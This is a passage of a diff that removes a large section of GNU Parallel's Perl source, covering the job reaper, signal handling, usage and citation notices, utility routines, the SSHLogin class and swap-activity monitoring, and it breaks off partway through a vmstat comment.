-	    ((defined $opt::tag) ?
-	     "--tagstring ".shell_quote_scalar($sshlogin->string()) : ""),
-	     " -S ", shell_quote_scalar($sshlogin->string())," ",
-	     join(" ",shell_quote(@command))," $quad @argfiles\n");
-	print $parallel_fh "$0 $suboptions -j1 $joblog ",
-	    ((defined $opt::tag) ?
-	     "--tagstring ".shell_quote_scalar($sshlogin->string()) : ""),
-	     " -S ", shell_quote_scalar($sshlogin->string())," ",
-	     join(" ",shell_quote(@command))," $quad @argfiles\n";
-    }
-    close $parallel_fh;
-    $Global::exitstatus = $? >> 8;
-    debug("init", "--onall exitvalue ", $?);
-    if(@opt::basefile) { cleanup_basefile(); }
-    $Global::debug or unlink(@argfiles);
-    my %seen;
-    for my $joblog (@joblogs) {
-	# Append to $joblog
-	open(my $fh, "<", $joblog) || ::die_bug("Cannot open tmp joblog $joblog");
-	# Skip first line (header);
-	<$fh>;
-	print $Global::joblog (<$fh>);
-	close $fh;
-	unlink($joblog);
-    }
-}
-
-sub __SIGNAL_HANDLING__ {}
-
-sub save_original_signal_handler {
-    # Remember the original signal handler
-    # Returns: N/A
-    $SIG{TERM} ||= sub { exit 0; }; # $SIG{TERM} is not set on Mac OS X
-    $SIG{INT} = sub { if($opt::tmux) { qx { tmux kill-session -t p$$ }; }
-		      unlink keys %Global::unlink; exit -1  };
-    $SIG{TERM} = sub { if($opt::tmux) { qx { tmux kill-session -t p$$ }; }
-		      unlink keys %Global::unlink; exit -1  };
-    %Global::original_sig = %SIG;
-    $SIG{TERM} = sub {}; # Dummy until jobs really start
-}
-
-sub list_running_jobs {
-    # Returns: N/A
-    for my $v (values %Global::running) {
-        print $Global::original_stderr "$Global::progname: ",$v->replaced(),"\n";
-    }
-}
-
-sub start_no_new_jobs {
-    # Returns: N/A
-    $SIG{TERM} = $Global::original_sig{TERM};
-    print $Global::original_stderr
-        ("$Global::progname: SIGTERM received. No new jobs will be started.\n",
-         "$Global::progname: Waiting for these ", scalar(keys %Global::running),
-         " jobs to finish. Send SIGTERM again to stop now.\n");
-    list_running_jobs();
-    $Global::start_no_new_jobs ||= 1;
-}
-
-sub reaper {
-    # A job finished.
-    # Print the output.
-    # Start another job
-    # Returns: N/A
-    my $stiff;
-    my $children_reaped = 0;
-    debug("run", "Reaper ");
-    while (($stiff = waitpid(-1, &WNOHANG)) > 0) {
-	$children_reaped++;
-        if($Global::sshmaster{$stiff}) {
-            # This is one of the ssh -M: ignore
-            next;
-        }
-        my $job = $Global::running{$stiff};
-	# '-a <(seq 10)' will give us a pid not in %Global::running
-        $job or next;
-        $job->set_exitstatus($? >> 8);
-        $job->set_exitsignal($? & 127);
-        debug("run", "died (", $job->exitstatus(), "): ", $job->seq());
-        $job->set_endtime(::now());
-        if($stiff == $Global::tty_taken) {
-            # The process that died had the tty => release it
-            $Global::tty_taken = 0;
-        }
-
-        if(not $job->should_be_retried()) {
-	    # The job is done
-	    # Free the jobslot
-	    push @Global::slots, $job->slot();
-	    if($opt::timeout) {
-		# Update average runtime for timeout
-		$Global::timeoutq->update_delta_time($job->runtime());
-	    }
-            # Force printing now if the job failed and we are going to exit
-            my $print_now = ($opt::halt_on_error and $opt::halt_on_error == 2
-			     and $job->exitstatus());
-            if($opt::keeporder and not $print_now) {
-                print_earlier_jobs($job);
-            } else {
-                $job->print();
-            }
-            if($job->exitstatus()) {
-		process_failed_job($job);
-	    }
-
-        }
-        my $sshlogin = $job->sshlogin();
-        $sshlogin->dec_jobs_running();
-        $sshlogin->inc_jobs_completed();
-        $Global::total_running--;
-        delete $Global::running{$stiff};
-	start_more_jobs();
-    }
-    debug("run", "done ");
-    return $children_reaped;
-}
-
-sub process_failed_job {
-    # The jobs had a exit status <> 0, so error
-    # Returns: N/A
-    my $job = shift;
-    $Global::exitstatus++;
-    $Global::total_failed++;
-    if($opt::halt_on_error) {
-	if($opt::halt_on_error == 1
-	   or
-	   ($opt::halt_on_error < 1 and $Global::total_failed > 3
-	    and
-	    $Global::total_failed / $Global::total_started > $opt::halt_on_error)) {
-	    # If halt on error == 1 or --halt 10%
-	    # we should gracefully exit
-	    print $Global::original_stderr
-		("$Global::progname: Starting no more jobs. ",
-		 "Waiting for ", scalar(keys %Global::running),
-		 " jobs to finish. This job failed:\n",
-		 $job->replaced(),"\n");
-	    $Global::start_no_new_jobs ||= 1;
-	    $Global::halt_on_error_exitstatus = $job->exitstatus();
-	} elsif($opt::halt_on_error == 2) {
-	    # If halt on error == 2 we should exit immediately
-	    print $Global::original_stderr
-		("$Global::progname: This job failed:\n",
-		 $job->replaced(),"\n");
-	    exit ($job->exitstatus());
-	}
-    }
-}
-
-{
-    my (%print_later,$job_end_sequence);
-
-    sub print_earlier_jobs {
-	# Print jobs completed earlier
-	# Returns: N/A
-	my $job = shift;
-	$print_later{$job->seq()} = $job;
-	$job_end_sequence ||= 1;
-	debug("run", "Looking for: $job_end_sequence ",
-	      "Current: ", $job->seq(), "\n");
-	for(my $j = $print_later{$job_end_sequence};
-	    $j or vec($Global::job_already_run,$job_end_sequence,1);
-	    $job_end_sequence++,
-	    $j = $print_later{$job_end_sequence}) {
-	    debug("run", "Found job end $job_end_sequence");
-	    if($j) {
-		$j->print();
-		delete $print_later{$job_end_sequence};
-	    }
-	}
-    }
-}
-
-sub __USAGE__ {}
-
-sub wait_and_exit {
-    # If we do not wait, we sometimes get segfault
-    # Returns: N/A
-    my $error = shift;
-    if($error) {
-	# Kill all without printing
-	for my $job (values %Global::running) {
-	    $job->kill("TERM");
-	    $job->kill("TERM");
-	}
-    }
-    for (keys %Global::unkilled_children) {
-        kill 9, $_;
-        waitpid($_,0);
-        delete $Global::unkilled_children{$_};
-    }
-    wait();
-    exit($error);
-}
-
-sub die_usage {
-    # Returns: N/A
-    usage();
-    wait_and_exit(255);
-}
-
-sub usage {
-    # Returns: N/A
-    print join
-	("\n",
-	 "Usage:",
-	 "",
-	 "$Global::progname [options] [command [arguments]] < list_of_arguments",
-	 "$Global::progname [options] [command [arguments]] (::: arguments|:::: argfile(s))...",
-	 "cat ... | $Global::progname --pipe [options] [command [arguments]]",
-	 "",
-	 "-j n            Run n jobs in parallel",
-	 "-k              Keep same order",
-	 "-X              Multiple arguments with context replace",
-	 "--colsep regexp Split input on regexp for positional replacements",
-	 "{} {.} {/} {/.} {#} {%} {= perl code =} Replacement strings",
-	 "{3} {3.} {3/} {3/.} {=3 perl code =}    Positional replacement strings",
-	 "With --plus:    {} = {+/}/{/} = {.}.{+.} = {+/}/{/.}.{+.} = {..}.{+..} =",
-	 "                {+/}/{/..}.{+..} = {...}.{+...} = {+/}/{/...}.{+...}",
-	 "",
-	 "-S sshlogin     Example: foo\@server.example.com",
-	 "--slf ..        Use ~/.parallel/sshloginfile as the list of sshlogins",
-	 "--trc {}.bar    Shorthand for --transfer --return {}.bar --cleanup",
-	 "--onall         Run the given command with argument on all sshlogins",
-	 "--nonall        Run the given command with no arguments on all sshlogins",
-	 "",
-	 "--pipe          Split stdin (standard input) to multiple jobs.",
-	 "--recend str    Record end separator for --pipe.",
-	 "--recstart str  Record start separator for --pipe.",
-	 "",
-	 "See 'man $Global::progname' for details",
-	 "",
-	 "When using programs that use GNU Parallel to process data for publication please cite:",
-	 "",
-	 "O. Tange (2011): GNU Parallel - The Command-Line Power Tool,",
-	 ";login: The USENIX Magazine, February 2011:42-47.",
-	 "",
-	 "Or you can get GNU Parallel without this requirement by paying 10000 EUR.",
-	 "");
-}
-
-
-sub citation_notice {
-    # if --no-notice or --plain: do nothing
-    # if stderr redirected: do nothing
-    # if ~/.parallel/will-cite: do nothing
-    # else: print citation notice to stderr
-    if($opt::no_notice
-       or
-       $opt::plain
-       or
-       not -t $Global::original_stderr
-       or
-       -e $ENV{'HOME'}."/.parallel/will-cite") {
-	# skip
-    } else {
-	print $Global::original_stderr
-	    ("When using programs that use GNU Parallel to process data for publication please cite:\n",
-	     "\n",
-	     "  O. Tange (2011): GNU Parallel - The Command-Line Power Tool,\n",
-	     "  ;login: The USENIX Magazine, February 2011:42-47.\n",
-	     "\n",
-	     "This helps funding further development; and it won't cost you a cent.\n",
-	     "Or you can get GNU Parallel without this requirement by paying 10000 EUR.\n",
-	     "\n",
-	     "To silence this citation notice run 'parallel --bibtex' once or use '--no-notice'.\n\n",
-	    );
-	flush $Global::original_stderr;
-    }
-}
-
-
-sub warning {
-    my @w = @_;
-    my $fh = $Global::original_stderr || *STDERR;
-    my $prog = $Global::progname || "parallel";
-    print $fh $prog, ": Warning: ", @w;
-}
-
-
-sub error {
-    my @w = @_;
-    my $fh = $Global::original_stderr || *STDERR;
-    my $prog = $Global::progname || "parallel";
-    print $fh $prog, ": Error: ", @w;
-}
-
-
-sub die_bug {
-    my $bugid = shift;
-    print STDERR
-	("$Global::progname: This should not happen. You have found a bug.\n",
-	 "Please contact <parallel\@gnu.org> and include:\n",
-	 "* The version number: $Global::version\n",
-	 "* The bugid: $bugid\n",
-	 "* The command line being run\n",
-	 "* The files being read (put the files on a webserver if they are big)\n",
-	 "\n",
-	 "If you get the error on smaller/fewer files, please include those instead.\n");
-    ::wait_and_exit(255);
-}
-
-sub version {
-    # Returns: N/A
-    if($opt::tollef and not $opt::gnu) {
-	print "WARNING: YOU ARE USING --tollef. IF THINGS ARE ACTING WEIRD USE --gnu.\n";
-    }
-    print join("\n",
-               "GNU $Global::progname $Global::version",
-               "Copyright (C) 2007,2008,2009,2010,2011,2012,2013,2014 Ole Tange and Free Software Foundation, Inc.",
-               "License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>",
-               "This is free software: you are free to change and redistribute it.",
-               "GNU $Global::progname comes with no warranty.",
-               "",
-               "Web site: http://www.gnu.org/software/${Global::progname}\n",
-	       "When using programs that use GNU Parallel to process data for publication please cite:\n",
-	       "O. Tange (2011): GNU Parallel - The Command-Line Power Tool, ",
-	       ";login: The USENIX Magazine, February 2011:42-47.\n",
-	       "Or you can get GNU Parallel without this requirement by paying 10000 EUR.\n",
-        );
-}
-
-sub bibtex {
-    # Returns: N/A
-    if($opt::tollef and not $opt::gnu) {
-	print "WARNING: YOU ARE USING --tollef. IF THINGS ARE ACTING WEIRD USE --gnu.\n";
-    }
-    print join("\n",
-	       "When using programs that use GNU Parallel to process data for publication please cite:",
-	       "",
-               "\@article{Tange2011a,",
-	       " title = {GNU Parallel - The Command-Line Power Tool},",
-	       " author = {O. Tange},",
-	       " address = {Frederiksberg, Denmark},",
-	       " journal = {;login: The USENIX Magazine},",
-	       " month = {Feb},",
-	       " number = {1},",
-	       " volume = {36},",
-	       " url = {http://www.gnu.org/s/parallel},",
-	       " year = {2011},",
-	       " pages = {42-47}",
-	       "}",
-	       "",
-	       "(Feel free to use \\nocite{Tange2011a})",
-	       "",
-	       "This helps funding further development.",
-	       "",
-	       "Or you can get GNU Parallel without this requirement by paying 10000 EUR.",
-	       ""
-        );
-    while(not -e $ENV{'HOME'}."/.parallel/will-cite") {
-	print "\nType: 'will cite' and press enter.\n> ";
-	my $input = <STDIN>;
-	if($input =~ /will cite/i) {
-	    mkdir $ENV{'HOME'}."/.parallel";
-	    open (my $fh, ">", $ENV{'HOME'}."/.parallel/will-cite")
-		|| ::die_bug("Cannot write: ".$ENV{'HOME'}."/.parallel/will-cite");
-	    close $fh;
-	    print "\nThank you for your support. It is much appreciated. The citation\n",
-	    "notice is now silenced.\n";
-	}
-    }
-}
-
-sub show_limits {
-    # Returns: N/A
-    print("Maximal size of command: ",Limits::Command::real_max_length(),"\n",
-          "Maximal used size of command: ",Limits::Command::max_length(),"\n",
-          "\n",
-          "Execution of  will continue now, and it will try to read its input\n",
-          "and run commands; if this is not what you wanted to happen, please\n",
-          "press CTRL-D or CTRL-C\n");
-}
-
-sub __GENERIC_COMMON_FUNCTION__ {}
-
-sub uniq {
-    # Remove duplicates and return unique values
-    return keys %{{ map { $_ => 1 } @_ }};
-}
-
-sub min {
-    # Returns:
-    #   Minimum value of array
-    my $min;
-    for (@_) {
-        # Skip undefs
-        defined $_ or next;
-        defined $min or do { $min = $_; next; }; # Set $_ to the first non-undef
-        $min = ($min < $_) ? $min : $_;
-    }
-    return $min;
-}
-
-sub max {
-    # Returns:
-    #   Maximum value of array
-    my $max;
-    for (@_) {
-        # Skip undefs
-        defined $_ or next;
-        defined $max or do { $max = $_; next; }; # Set $_ to the first non-undef
-        $max = ($max > $_) ? $max : $_;
-    }
-    return $max;
-}
-
-sub sum {
-    # Returns:
-    #   Sum of values of array
-    my @args = @_;
-    my $sum = 0;
-    for (@args) {
-        # Skip undefs
-        $_ and do { $sum += $_; }
-    }
-    return $sum;
-}
-
-sub undef_as_zero {
-    my $a = shift;
-    return $a ? $a : 0;
-}
-
-sub undef_as_empty {
-    my $a = shift;
-    return $a ? $a : "";
-}
-
-{
-    my $hostname;
-    sub hostname {
-	if(not $hostname) {
-	    $hostname = `hostname`;
-	    chomp($hostname);
-	    $hostname ||= "nohostname";
-	}
-	return $hostname;
-    }
-}
-
-sub which {
-    # Input:
-    #   @programs = programs to find the path to
-    # Returns:
-    #   @full_path = full paths to @programs. Nothing if not found
-    my @which;
-    for my $prg (@_) {
-	push @which, map { $_."/".$prg } grep { -x $_."/".$prg } split(":",$ENV{'PATH'});
-    }
-    return @which;
-}
-
-{
-    my ($regexp,%fakename);
-
-    sub parent_shell {
-	# Input:
-	#   $pid = pid to see if (grand)*parent is a shell
-	# Returns:
-	#   $shellpath = path to shell - undef if no shell found
-	my $pid = shift;
-	if(not $regexp) {
-	    # All shells known to mankind
-	    #
-	    # ash bash csh dash fdsh fish fizsh ksh ksh93 mksh pdksh
-	    # posh rbash rush rzsh sash sh static-sh tcsh yash zsh
-	    my @shells = qw(ash bash csh dash fdsh fish fizsh ksh
-                            ksh93 mksh pdksh posh rbash rush rzsh
-                            sash sh static-sh tcsh yash zsh -sh -csh);
-	    # Can be formatted as:
-	    #   [sh]  -sh  sh  busybox sh
-	    #   /bin/sh /sbin/sh /opt/csw/sh
-	    # NOT: foo.sh sshd crash flush pdflush scosh fsflush ssh
-	    my $shell = "(?:".join("|",@shells).")";
-	    $regexp = '^((\[)('. $shell. ')(\])|(|\S+/|busybox )('. $shell. '))($| )';
-	    %fakename = (
-		# csh and tcsh disguise themselves as -sh/-csh
-		"-sh" => ["csh", "tcsh"],
-		"-csh" => ["tcsh", "csh"],
-		);
-	}
-	my ($children_of_ref, $parent_of_ref, $name_of_ref) = pid_table();
-	my $shellpath;
-	my $testpid = $pid;
-	while($testpid) {
-	    ::debug("init", "shell? ". $name_of_ref->{$testpid}."\n");
-	    if($name_of_ref->{$testpid} =~ /$regexp/o) {
-		::debug("init", "which ".($3||$6)." => ");
-		$shellpath = (which($3 || $6,@{$fakename{$3 || $6}}))[0];
-		::debug("init", "shell path $shellpath\n");
-		$shellpath and last;
-	    }
-	    $testpid = $parent_of_ref->{$testpid};
-	}
-	return $shellpath;
-    }
-}
-
-{
-    my %pid_parentpid_cmd;
-
-    sub pid_table {
-	# Returns:
-	#   %children_of = { pid -> children of pid }
-	#   %parent_of = { pid -> pid of parent }
-	#   %name_of = { pid -> commandname }
-
-       	if(not %pid_parentpid_cmd) {
-	    # Filter for SysV-style `ps`
-	    my $sysv = q( ps -ef | perl -ane '1..1 and /^(.*)CO?MM?A?N?D/ and $s=length $1;).
-		q(s/^.{$s}//; print "@F[1,2] $_"' );
-	    # BSD-style `ps`
-	    my $bsd = q(ps -o pid,ppid,command -ax);
-	    %pid_parentpid_cmd =
-	    (
-	     'aix' => $sysv,
-	     'cygwin' => $sysv,
-	     'msys' => $sysv,
-	     'dec_osf' => $sysv,
-	     'darwin' => $bsd,
-	     'dragonfly' => $bsd,
-	     'freebsd' => $bsd,
-	     'gnu' => $sysv,
-	     'hpux' => $sysv,
-	     'linux' => $sysv,
-	     'mirbsd' => $bsd,
-	     'netbsd' => $bsd,
-	     'nto' => $sysv,
-	     'openbsd' => $bsd,
-	     'solaris' => $sysv,
-	     'svr5' => $sysv,
-	    );
-	}
-	$pid_parentpid_cmd{$^O} or ::die_bug("pid_parentpid_cmd for $^O missing");
-
-	my (@pidtable,%parent_of,%children_of,%name_of);
-	# Table with pid -> children of pid
-	@pidtable = `$pid_parentpid_cmd{$^O}`;
-	my $p=$$;
-	for (@pidtable) {
-	    # must match: 24436 21224 busybox ash
-	    /(\S+)\s+(\S+)\s+(\S+.*)/ or ::die_bug("pidtable format: $_");
-	    $parent_of{$1} = $2;
-	    push @{$children_of{$2}}, $1;
-	    $name_of{$1} = $3;
-	}
-	return(\%children_of, \%parent_of, \%name_of);
-    }
-}
-
-sub reap_usleep {
-    # Reap dead children.
-    # If no dead children: Sleep specified amount with exponential backoff
-    # Input:
-    #   $ms = milliseconds to sleep
-    # Returns:
-    #   $ms/2+0.001 if children reaped
-    #   $ms*1.1 if no children reaped
-    my $ms = shift;
-    if(reaper()) {
-	# Sleep exponentially shorter (1/2^n) if a job finished
-	return $ms/2+0.001;
-    } else {
-	if($opt::timeout) {
-	    $Global::timeoutq->process_timeouts();
-	}
-	usleep($ms);
-	Job::exit_if_disk_full();
-	if($opt::linebuffer) {
-	    for my $job (values %Global::running) {
-		$job->print();
-	    }
-	}
-	# Sleep exponentially longer (1.1^n) if a job did not finish
-	# though at most 1000 ms.
-	return (($ms < 1000) ? ($ms * 1.1) : ($ms));
-    }
-}
-
-sub usleep {
-    # Sleep this many milliseconds.
-    # Input:
-    #   $ms = milliseconds to sleep
-    my $ms = shift;
-    ::debug(int($ms),"ms ");
-    select(undef, undef, undef, $ms/1000);
-}
-
-sub now {
-    # Returns time since epoch as in seconds with 3 decimals
-    # Uses:
-    #   @Global::use
-    # Returns:
-    #   $time = time now with millisecond accuracy
-    if(not $Global::use{"Time::HiRes"}) {
-	if(eval "use Time::HiRes qw ( time );") {
-	    eval "sub TimeHiRestime { return Time::HiRes::time };";
-	} else {
-	    eval "sub TimeHiRestime { return time() };";
-	}
-	$Global::use{"Time::HiRes"} = 1;
-    }
-
-    return (int(TimeHiRestime()*1000))/1000;
-}
-
-sub multiply_binary_prefix {
-    # Evalualte numbers with binary prefix
-    # Ki=2^10, Mi=2^20, Gi=2^30, Ti=2^40, Pi=2^50, Ei=2^70, Zi=2^80, Yi=2^80
-    # ki=2^10, mi=2^20, gi=2^30, ti=2^40, pi=2^50, ei=2^70, zi=2^80, yi=2^80
-    # K =2^10, M =2^20, G =2^30, T =2^40, P =2^50, E =2^70, Z =2^80, Y =2^80
-    # k =10^3, m =10^6, g =10^9, t=10^12, p=10^15, e=10^18, z=10^21, y=10^24
-    # 13G = 13*1024*1024*1024 = 13958643712
-    # Input:
-    #   $s = string with prefixes
-    # Returns:
-    #   $value = int with prefixes multiplied
-    my $s = shift;
-    $s =~ s/ki/*1024/gi;
-    $s =~ s/mi/*1024*1024/gi;
-    $s =~ s/gi/*1024*1024*1024/gi;
-    $s =~ s/ti/*1024*1024*1024*1024/gi;
-    $s =~ s/pi/*1024*1024*1024*1024*1024/gi;
-    $s =~ s/ei/*1024*1024*1024*1024*1024*1024/gi;
-    $s =~ s/zi/*1024*1024*1024*1024*1024*1024*1024/gi;
-    $s =~ s/yi/*1024*1024*1024*1024*1024*1024*1024*1024/gi;
-    $s =~ s/xi/*1024*1024*1024*1024*1024*1024*1024*1024*1024/gi;
-
-    $s =~ s/K/*1024/g;
-    $s =~ s/M/*1024*1024/g;
-    $s =~ s/G/*1024*1024*1024/g;
-    $s =~ s/T/*1024*1024*1024*1024/g;
-    $s =~ s/P/*1024*1024*1024*1024*1024/g;
-    $s =~ s/E/*1024*1024*1024*1024*1024*1024/g;
-    $s =~ s/Z/*1024*1024*1024*1024*1024*1024*1024/g;
-    $s =~ s/Y/*1024*1024*1024*1024*1024*1024*1024*1024/g;
-    $s =~ s/X/*1024*1024*1024*1024*1024*1024*1024*1024*1024/g;
-
-    $s =~ s/k/*1000/g;
-    $s =~ s/m/*1000*1000/g;
-    $s =~ s/g/*1000*1000*1000/g;
-    $s =~ s/t/*1000*1000*1000*1000/g;
-    $s =~ s/p/*1000*1000*1000*1000*1000/g;
-    $s =~ s/e/*1000*1000*1000*1000*1000*1000/g;
-    $s =~ s/z/*1000*1000*1000*1000*1000*1000*1000/g;
-    $s =~ s/y/*1000*1000*1000*1000*1000*1000*1000*1000/g;
-    $s =~ s/x/*1000*1000*1000*1000*1000*1000*1000*1000*1000/g;
-
-    $s = eval $s;
-    ::debug($s);
-    return $s;
-}
-
-sub tmpfile {
-    # Create tempfile as $TMPDIR/parXXXXX
-    # Returns:
-    #   $filename = file name created
-    return ::tempfile(DIR=>$ENV{'TMPDIR'}, TEMPLATE => 'parXXXXX', @_);
-}
-
-sub __DEBUGGING__ {}
-
-sub debug {
-    # Uses:
-    #   $Global::debug
-    #   %Global::fd
-    # Returns: N/A
-    $Global::debug or return;
-    @_ = grep { defined $_ ? $_ : "" } @_;
-    if($Global::debug eq "all" or $Global::debug eq $_[0]) {
-	if($Global::fd{1}) {
-	    # Original stdout was saved
-	    my $stdout = $Global::fd{1};
-	    print $stdout @_[1..$#_];
-	} else {
-	    print @_[1..$#_];
-	}
-    }
-}
-
-sub my_memory_usage {
-    # Returns:
-    #   memory usage if found
-    #   0 otherwise
-    use strict;
-    use FileHandle;
-
-    my $pid = $$;
-    if(-e "/proc/$pid/stat") {
-        my $fh = FileHandle->new("</proc/$pid/stat");
-
-        my $data = <$fh>;
-        chomp $data;
-        $fh->close;
-
-        my @procinfo = split(/\s+/,$data);
-
-        return undef_as_zero($procinfo[22]);
-    } else {
-        return 0;
-    }
-}
-
-sub my_size {
-    # Returns:
-    #   $size = size of object if Devel::Size is installed
-    #   -1 otherwise
-    my @size_this = (@_);
-    eval "use Devel::Size qw(size total_size)";
-    if ($@) {
-        return -1;
-    } else {
-        return total_size(@_);
-    }
-}
-
-sub my_dump {
-    # Returns:
-    #   ascii expression of object if Data::Dump(er) is installed
-    #   error code otherwise
-    my @dump_this = (@_);
-    eval "use Data::Dump qw(dump);";
-    if ($@) {
-        # Data::Dump not installed
-        eval "use Data::Dumper;";
-        if ($@) {
-            my $err =  "Neither Data::Dump nor Data::Dumper is installed\n".
-                "Not dumping output\n";
-            print $Global::original_stderr $err;
-            return $err;
-        } else {
-            return Dumper(@dump_this);
-        }
-    } else {
-	# Create a dummy Data::Dump:dump as Hans Schou sometimes has
-	# it undefined
-	eval "sub Data::Dump:dump {}";
-        eval "use Data::Dump qw(dump);";
-        return (Data::Dump::dump(@dump_this));
-    }
-}
-
-sub my_croak {
-    eval "use Carp; 1";
-    $Carp::Verbose = 1;
-    croak(@_);
-}
-
-sub my_carp {
-    eval "use Carp; 1";
-    $Carp::Verbose = 1;
-    carp(@_);
-}
-
-sub __OBJECT_ORIENTED_PARTS__ {}
-
-package SSHLogin;
-
-sub new {
-    my $class = shift;
-    my $sshlogin_string = shift;
-    my $ncpus;
-    my %hostgroups;
-    # SSHLogins can have these formats:
-    #   @grp+grp/ncpu//usr/bin/ssh user@server
-    #   ncpu//usr/bin/ssh user@server
-    #   /usr/bin/ssh user@server
-    #   user@server
-    #   ncpu/user@server
-    #   @grp+grp/user@server
-    if($sshlogin_string =~ s:^\@([^/]+)/?::) {
-        # Look for SSHLogin hostgroups
-        %hostgroups = map { $_ => 1 } split(/\+/, $1);
-    }
-    if ($sshlogin_string =~ s:^(\d+)/::) {
-        # Override default autodetected ncpus unless missing
-        $ncpus = $1;
-    }
-    my $string = $sshlogin_string;
-    # An SSHLogin is always in the hostgroup of its $string-name
-    $hostgroups{$string} = 1;
-    @Global::hostgroups{keys %hostgroups} = values %hostgroups;
-    my @unget = ();
-    my $no_slash_string = $string;
-    $no_slash_string =~ s/[^-a-z0-9:]/_/gi;
-    return bless {
-        'string' => $string,
-        'jobs_running' => 0,
-        'jobs_completed' => 0,
-        'maxlength' => undef,
-        'max_jobs_running' => undef,
-        'orig_max_jobs_running' => undef,
-        'ncpus' => $ncpus,
-        'hostgroups' => \%hostgroups,
-        'sshcommand' => undef,
-        'serverlogin' => undef,
-        'control_path_dir' => undef,
-        'control_path' => undef,
-	'time_to_login' => undef,
-	'last_login_at' => undef,
-        'loadavg_file' => $ENV{'HOME'} . "/.parallel/tmp/loadavg-" .
-            $no_slash_string,
-        'loadavg' => undef,
-	'last_loadavg_update' => 0,
-        'swap_activity_file' => $ENV{'HOME'} . "/.parallel/tmp/swap_activity-" .
-            $no_slash_string,
-        'swap_activity' => undef,
-    }, ref($class) || $class;
-}
-
-sub DESTROY {
-    my $self = shift;
-    # Remove temporary files if they are created.
-    unlink $self->{'loadavg_file'};
-    unlink $self->{'swap_activity_file'};
-}
-
-sub string {
-    my $self = shift;
-    return $self->{'string'};
-}
-
-sub jobs_running {
-    my $self = shift;
-
-    return ($self->{'jobs_running'} || "0");
-}
-
-sub inc_jobs_running {
-    my $self = shift;
-    $self->{'jobs_running'}++;
-}
-
-sub dec_jobs_running {
-    my $self = shift;
-    $self->{'jobs_running'}--;
-}
-
-sub set_maxlength {
-    my $self = shift;
-    $self->{'maxlength'} = shift;
-}
-
-sub maxlength {
-    my $self = shift;
-    return $self->{'maxlength'};
-}
-
-sub jobs_completed {
-    my $self = shift;
-    return $self->{'jobs_completed'};
-}
-
-sub in_hostgroups {
-    # Input:
-    #   @hostgroups = the hostgroups to look for
-    # Returns:
-    #   true if intersection of @hostgroups and the hostgroups of this
-    #        SSHLogin is non-empty
-    my $self = shift;
-    return grep { defined $self->{'hostgroups'}{$_} } @_;
-}
-
-sub hostgroups {
-    my $self = shift;
-    return keys %{$self->{'hostgroups'}};
-}
-
-sub inc_jobs_completed {
-    my $self = shift;
-    $self->{'jobs_completed'}++;
-}
-
-sub set_max_jobs_running {
-    my $self = shift;
-    if(defined $self->{'max_jobs_running'}) {
-        $Global::max_jobs_running -= $self->{'max_jobs_running'};
-    }
-    $self->{'max_jobs_running'} = shift;
-    if(defined $self->{'max_jobs_running'}) {
-        # max_jobs_running could be resat if -j is a changed file
-        $Global::max_jobs_running += $self->{'max_jobs_running'};
-    }
-    # Initialize orig to the first non-zero value that comes around
-    $self->{'orig_max_jobs_running'} ||= $self->{'max_jobs_running'};
-}
-
-sub swapping {
-    my $self = shift;
-    my $swapping = $self->swap_activity();
-    return (not defined $swapping or $swapping)
-}
-
-sub swap_activity {
-    # If the currently known swap activity is too old:
-    #   Recompute a new one in the background
-    # Returns:
-    #   last swap activity computed
-    my $self = shift;
-    # Should we update the swap_activity file?
-    my $update_swap_activity_file = 0;
-    if(-r $self->{'swap_activity_file'}) {
-        open(my $swap_fh, "<", $self->{'swap_activity_file'}) || ::die_bug("swap_activity_file-r");
-        my $swap_out = <$swap_fh>;
-        close $swap_fh;
-        if($swap_out =~ /^(\d+)$/) {
-            $self->{'swap_activity'} = $1;
-            ::debug("swap", "New swap_activity: ", $self->{'swap_activity'});
-        }
-        ::debug("swap", "Last update: ", $self->{'last_swap_activity_update'});
-        if(time - $self->{'last_swap_activity_update'} > 10) {
-            # last swap activity update was started 10 seconds ago
-            ::debug("swap", "Older than 10 sec: ", $self->{'swap_activity_file'});
-            $update_swap_activity_file = 1;
-        }
-    } else {
-        ::debug("swap", "No swap_activity file: ", $self->{'swap_activity_file'});
-        $self->{'swap_activity'} = undef;
-        $update_swap_activity_file = 1;
-    }
-    if($update_swap_activity_file) {
-        ::debug("swap", "Updating swap_activity file ", $self->{'swap_activity_file'});
-        $self->{'last_swap_activity_update'} = time;
-        -e $ENV{'HOME'}."/.parallel" or mkdir $ENV{'HOME'}."/.parallel";
-        -e $ENV{'HOME'}."/.parallel/tmp" or mkdir $ENV{'HOME'}."/.parallel/tmp";
-        my $swap_activity;
-	$swap_activity = swapactivityscript();
-        if($self->{'string'} ne ":") {
-            $swap_activity = $self->sshcommand() . " " . $self->serverlogin() . " " .
-		::shell_quote_scalar($swap_activity);
-        }
-        # Run swap_activity measuring.
-        # As the command can take long to run if run remote
-        # save it to a tmp file before moving it to the correct file
-        my $file = $self->{'swap_activity_file'};
-        my ($dummy_fh, $tmpfile) = ::tmpfile(SUFFIX => ".swp");
-	::debug("swap", "\n", $swap_activity, "\n");
-        qx{ ($swap_activity > $tmpfile && mv $tmpfile $file || rm $tmpfile) & };
-    }
-    return $self->{'swap_activity'};
-}
-
-{
-    my $script;
-
-    sub swapactivityscript {
-	# Returns:
-	#   shellscript for detecting swap activity
-	#
-	# arguments for vmstat are OS dependant
-	# swap_in and swap_out are in different columns depending on OS
-	#
-	if(not $script) {
-	    my %vmstat = (
-		# linux: $7*$8
-		# $ vmstat 1 2
-		# procs -----------memory---------- ---swap-- -----io---- -system-- ----cpu----
-		#  r  b   swpd   free   buff  cache   si   so    bi    bo   in   cs us sy id wa
-		#  5  0  51208 1701096 198012 18857888    0    0    37   153   28   19 56 11 33  1
-		#  3  0  51208 1701288 198012 18857972    0    0     0     0 3638 10412 15  3 82  0
-		'linux' => ['vmstat 1 2 | tail -n1', '$7*$8'],
-
-		# solaris: $6*$7
-		# $ vmstat -S 1 2
-		#  kthr      memory            page            disk          faults      cpu
-		#  r b w   swap  free  si  so pi po fr de sr s3 s4 -- --   in   sy   cs us sy id
-		#  0 0 0 4628952 3208408 0  0  3  1  1  0  0 -0  2  0  0  263  613  246  1  2 97
-		#  0 0 0 4552504 3166360 0  0  0  0  0  0  0  0  0  0  0  246  213  240  1  1 98
-		'solaris' => ['vmstat -S 1 2 | tail -1', '$6*$7'],
-
-		# darwin (macosx): $21*$22
-		# $ vm_stat -c 2 1
-		# Mach Virtual Memory Statistics: (page size of 4096 bytes)
-		#     free   active   specul inactive throttle    wired  prgable   faults     copy    0fill reactive   purged file-backed anonymous cmprssed cmprssor  dcomprs   comprs  pageins  pageout  swapins swapouts
